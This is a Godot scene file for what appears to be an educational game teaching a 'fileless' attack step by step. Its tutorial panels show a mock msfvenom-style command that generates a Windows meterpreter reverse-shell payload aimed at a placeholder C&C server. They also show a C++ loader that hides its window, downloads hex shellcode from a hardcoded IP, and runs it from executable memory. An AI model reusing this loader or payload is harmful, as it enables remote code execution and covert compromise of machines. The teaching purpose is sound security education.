[gd_scene load_steps=8 format=3 uid="uid://biq1t4o3no8ef"]

[ext_resource type="PackedScene" uid="uid://cnlake8o686ww" path="res://Scenes/gui/CleanUI/icon.tscn" id="1_hq362"]
[ext_resource type="Script" uid="uid://bkb8jr7yeiwnk" path="res://Scenes/Attacks/Final Attack GUI/fileless.gd" id="1_tpj4y"]
[ext_resource type="Script" uid="uid://cpwr37ebspmj0" path="res://addons/RadialMenu/RadialMenu.gd" id="2_b8r0q"]
[ext_resource type="Script" uid="uid://bwie15hglluo4" path="res://Scenes/Attacks/Final Attack GUI/fileless_terminal.gd" id="4_tpj4y"]
[ext_resource type="Script" uid="uid://cgchkgfufrsn7" path="res://Scenes/Attacks/Final Attack GUI/boilerplate.gd" id="5_30l7x"]

[sub_resource type="Shader" id="Shader_wwpmy"]
code = "shader_type canvas_item;
render_mode blend_mix, unshaded;

// The full color of the rectangle
uniform vec4 rect_color : source_color = vec4(1.0, 0.2, 0.2, 1.0); // red

// Hole configuration
uniform vec2 hole_position = vec2(0.0, 0.0); // Top-left corner of the hole (in pixels)
uniform vec2 hole_size = vec2(50.0, 50.0);   // Width and height of the hole (square or rectangle)

void fragment() {
    // Convert UV to local pixel coordinates
    vec2 pixel_pos = UV * vec2(textureSize(TEXTURE, 0));

    // Check if we're inside the hole area
    bool in_hole = pixel_pos.x > hole_position.x &&
                   pixel_pos.x < hole_position.x + hole_size.x &&
                   pixel_pos.y > hole_position.y &&
                   pixel_pos.y < hole_position.y + hole_size.y;

    if (in_hole) {
        discard; // Make transparent
    }

    COLOR = rect_color;
}
"

[sub_resource type="ShaderMaterial" id="ShaderMaterial_j4e7k"]
shader = SubResource("Shader_wwpmy")
shader_parameter/rect_color = Color(0, 0, 0, 0.607843)
shader_parameter/hole_position = Vector2(0.115, 0.045)
shader_parameter/hole_size = Vector2(3.3, 0.2)

[node name="Control" type="TabContainer"]
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
current_tab = 1
clip_tabs = false
tabs_visible = false
script = ExtResource("1_tpj4y")

[node name="Margin" type="MarginContainer" parent="."]
visible = false
layout_mode = 2
theme_override_constants/margin_left = 25
theme_override_constants/margin_top = 25
theme_override_constants/margin_right = 25
theme_override_constants/margin_bottom = 25
metadata/_tab_index = 0

[node name="Desktop" type="VFlowContainer" parent="Margin"]
layout_mode = 2
theme_override_constants/h_separation = 20

[node name="Icon" parent="Margin/Desktop" instance=ExtResource("1_hq362")]
layout_mode = 2

[node name="Label" parent="Margin/Desktop/Icon" index="1"]
text = "PDF"

[node name="Icon2" parent="Margin/Desktop" instance=ExtResource("1_hq362")]
layout_mode = 2

[node name="Icon3" parent="Margin/Desktop" instance=ExtResource("1_hq362")]
layout_mode = 2

[node name="Label" parent="Margin/Desktop/Icon3" index="1"]
text = "PNG"

[node name="Icon4" parent="Margin/Desktop" instance=ExtResource("1_hq362")]
layout_mode = 2

[node name="Icon5" parent="Margin/Desktop" instance=ExtResource("1_hq362")]
layout_mode = 2

[node name="RadialMenu" type="Control" parent="Margin/Desktop"]
visible = false
custom_minimum_size = Vector2(300, 222.263)
layout_mode = 2
size_flags_horizontal = 0
size_flags_vertical = 0
script = ExtResource("2_b8r0q")

[node name="Fileless" type="MarginContainer" parent="."]
layout_mode = 2
theme_override_constants/margin_left = 25
theme_override_constants/margin_top = 25
theme_override_constants/margin_right = 25
theme_override_constants/margin_bottom = 25
script = ExtResource("4_tpj4y")
metadata/_tab_index = 1

[node name="HSplitContainer" type="HBoxContainer" parent="Fileless"]
layout_mode = 2

[node name="CodeEdit" type="CodeEdit" parent="Fileless/HSplitContainer"]
layout_mode = 2
size_flags_horizontal = 3
theme_override_font_sizes/font_size = 18
text = "root@cali :~ # msfpoison -p windows/meterpreter/reverse_tcp LHOST=
<C&C Server IP Address>  LPORT=<C&C Server Port> --platform windowds 
--arch x86 -f c -o shellcode.txt

[-] No platform was selected, choosing Msf::Module::Platform::Windows 
from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Saved as: shellcode.txt
root@cali:- # clear"
gutters_draw_breakpoints_gutter = true
gutters_draw_bookmarks = true
gutters_draw_executing_lines = true
gutters_draw_line_numbers = true
gutters_zero_pad_line_numbers = true

[node name="Overlay" type="ColorRect" parent="Fileless/HSplitContainer/CodeEdit"]
material = SubResource("ShaderMaterial_j4e7k")
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
mouse_filter = 2

[node name="HFlowContainer" type="HFlowContainer" parent="Fileless/HSplitContainer"]
layout_mode = 2
alignment = 1
last_wrap_alignment = 2

[node name="RichTextLabel" type="RichTextLabel" parent="Fileless/HSplitContainer/HFlowContainer"]
texture_filter = 1
layout_mode = 2
size_flags_horizontal = 3
theme_override_font_sizes/normal_font_size = 18
text = "Now let's start creating the payload"
fit_content = true

[node name="Buttons" type="HBoxContainer" parent="Fileless/HSplitContainer/HFlowContainer"]
self_modulate = Color(1, 1, 1, 0)
layout_mode = 2
size_flags_vertical = 8
theme_override_constants/separation = 165

[node name="Back" type="Button" parent="Fileless/HSplitContainer/HFlowContainer/Buttons"]
layout_mode = 2
theme_override_font_sizes/font_size = 18
text = "Back"
metadata/_edit_use_anchors_ = true

[node name="Next" type="Button" parent="Fileless/HSplitContainer/HFlowContainer/Buttons"]
layout_mode = 2
theme_override_font_sizes/font_size = 18
text = "Next"
metadata/_edit_use_anchors_ = true

[node name="boilerplate" type="MarginContainer" parent="."]
visible = false
layout_mode = 2
theme_override_constants/margin_left = 25
theme_override_constants/margin_top = 25
theme_override_constants/margin_right = 25
theme_override_constants/margin_bottom = 25
script = ExtResource("5_30l7x")
metadata/_tab_index = 2

[node name="HSplitContainer" type="HBoxContainer" parent="boilerplate"]
layout_mode = 2

[node name="CodeEdit" type="CodeEdit" parent="boilerplate/HSplitContainer"]
layout_mode = 2
size_flags_horizontal = 3
theme_override_colors/background_color = Color(0.000256838, 0.0171302, 0.0816404, 1)
theme_override_font_sizes/font_size = 18
text = "#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {

    ::ShowWindow(::GetConsoleWindow(), SW_HIDE); // SW_SHOW;
    
    cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.29.208/home\" });
    char* memBuffer = NULL;
    memBuffer = (char *)r.text.c_str();

    unsigned char shellcode[382]; // This is the size of shellcode
    memBuffer += 2;
    for (size_t count = 0; count < sizeof shellcode - 1; count++) {
        sscanf_s(memBuffer, \"%02hhx\", &shellcode[count]);
        memBuffer = memBuffer + 4;
    }

    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_
EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();
}"
scroll_smooth = true
gutters_draw_breakpoints_gutter = true
gutters_draw_bookmarks = true
gutters_draw_executing_lines = true
gutters_draw_line_numbers = true
gutters_zero_pad_line_numbers = true

[node name="Overlay" type="ColorRect" parent="boilerplate/HSplitContainer/CodeEdit"]
material = SubResource("ShaderMaterial_j4e7k")
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
mouse_filter = 2

[node name="HFlowContainer" type="HFlowContainer" parent="boilerplate/HSplitContainer"]
layout_mode = 2
alignment = 1
last_wrap_alignment = 2

[node name="RichTextLabel" type="RichTextLabel" parent="boilerplate/HSplitContainer/HFlowContainer"]
texture_filter = 1
layout_mode = 2
size_flags_horizontal = 3
theme_override_font_sizes/normal_font_size = 18
text = "Now let's create the boilerplate "
fit_content = true

[node name="Buttons" type="HBoxContainer" parent="boilerplate/HSplitContainer/HFlowContainer"]
self_modulate = Color(1, 1, 1, 0)
layout_mode = 2
size_flags_vertical = 8
theme_override_constants/separation = 165

[node name="Back" type="Button" parent="boilerplate/HSplitContainer/HFlowContainer/Buttons"]
layout_mode = 2
theme_override_font_sizes/font_size = 18
text = "Back"
metadata/_edit_use_anchors_ = true

[node name="Next" type="Button" parent="boilerplate/HSplitContainer/HFlowContainer/Buttons"]
layout_mode = 2
theme_override_font_sizes/font_size = 18
text = "Next"
metadata/_edit_use_anchors_ = true

[connection signal="pressed" from="Margin/Desktop/Icon/Button" to="." method="_on_button_pressed_vscode"]
[connection signal="pressed" from="Margin/Desktop/Icon2/Button" to="." method="_on_button_pressed"]
[connection signal="button_down" from="Fileless/HSplitContainer/HFlowContainer/Buttons/Back" to="Fileless" method="_on_back_button_down"]
[connection signal="button_down" from="Fileless/HSplitContainer/HFlowContainer/Buttons/Next" to="Fileless" method="_on_next_button_down"]
[connection signal="button_down" from="boilerplate/HSplitContainer/HFlowContainer/Buttons/Back" to="boilerplate" method="_on_back_button_down"]
[connection signal="button_down" from="boilerplate/HSplitContainer/HFlowContainer/Buttons/Next" to="boilerplate" method="_on_next_button_down"]

[editable path="Margin/Desktop/Icon"]
[editable path="Margin/Desktop/Icon2"]
[editable path="Margin/Desktop/Icon3"]
[editable path="Margin/Desktop/Icon4"]
